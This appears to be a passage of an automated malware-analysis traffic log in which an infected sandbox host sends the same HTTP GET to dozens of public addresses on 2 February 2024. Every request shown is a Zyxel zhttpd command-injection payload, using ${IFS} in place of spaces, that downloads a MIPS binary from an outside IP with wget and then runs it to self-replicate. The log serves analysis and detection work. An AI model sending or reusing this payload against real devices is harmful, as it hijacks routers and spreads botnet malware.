                                            Feb 2, 2024 06:20:23.153657913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            86192.168.2.153320842.90.8.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153661013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            87192.168.2.155500898.11.100.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153676033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            88192.168.2.1542898109.134.183.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153697968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            89192.168.2.154300442.183.76.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153728962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            90192.168.2.155486845.178.127.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153758049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            91192.168.2.1557344154.250.21.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153779030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            92192.168.2.1553274146.34.10.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153809071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            93192.168.2.1560624203.196.88.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153848886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            94192.168.2.1543958130.15.81.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153876066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            95192.168.2.154834858.32.216.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153893948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            96192.168.2.1553994122.12.89.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153917074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            97192.168.2.155638281.249.208.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153934002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            98192.168.2.1541446110.16.142.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153969049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            99192.168.2.1545278203.116.247.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.153975964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            100192.168.2.1539872192.0.236.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154000998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            101192.168.2.154951497.68.152.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154021025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            102192.168.2.155181231.232.115.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154046059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            103192.168.2.1533808150.6.196.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154076099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            104192.168.2.1544732178.160.52.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154099941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            105192.168.2.155294458.246.81.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154105902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            106192.168.2.154756037.219.138.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154144049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            107192.168.2.155067243.91.176.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154179096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            108192.168.2.1534582180.80.201.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154189110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            109192.168.2.1556716102.196.46.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154232979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            110192.168.2.1547338116.212.170.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154237032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            111192.168.2.154101425.51.47.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154266119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            112192.168.2.1542320217.54.152.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154289961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            113192.168.2.1553510201.36.180.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154715061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            114192.168.2.153382857.174.34.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154731035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            115192.168.2.1542410204.93.173.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154758930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            116192.168.2.1558322186.123.60.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154793978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            117192.168.2.1535424146.218.179.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154804945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            118192.168.2.1540942101.133.208.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154829979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            119192.168.2.1556558131.137.197.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154850006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            120192.168.2.154408674.233.35.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154875040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            121192.168.2.1551068199.252.181.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154894114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            122192.168.2.1542096175.75.230.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154925108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            123192.168.2.154954891.70.209.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154946089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            124192.168.2.1548226134.128.223.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154970884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            125192.168.2.1550160146.174.185.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.154993057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            126192.168.2.1543892196.36.95.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155025005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            127192.168.2.1545368125.208.250.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155036926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            128192.168.2.1541214187.180.164.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155092001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            129192.168.2.153446434.83.186.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155107975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            130192.168.2.155335044.163.254.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155133009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            131192.168.2.155729859.215.181.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155174017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            132192.168.2.1554018170.255.225.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155213118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            133192.168.2.154260225.91.0.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155224085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            134192.168.2.153977493.214.162.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155241966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            135192.168.2.1551924196.62.193.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155319929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            136192.168.2.1543572103.255.253.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155365944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            137192.168.2.153543892.242.29.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155380964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            138192.168.2.154334823.78.65.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155394077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            139192.168.2.1539708213.22.20.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155394077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            140192.168.2.1545880122.201.33.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155402899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            141192.168.2.1557762109.212.53.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155431032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            142192.168.2.1544108190.68.41.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155450106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            143192.168.2.154607888.137.165.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155488014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            144192.168.2.1551480205.208.65.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155489922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            145192.168.2.153771041.186.55.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155519962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            146192.168.2.1543122173.48.121.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155551910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            147192.168.2.1544926148.249.173.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155667067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            148192.168.2.1542104120.43.177.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:23.155678034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            149192.168.2.153990882.248.203.242443
                                            TimestampBytes transferredDirectionData
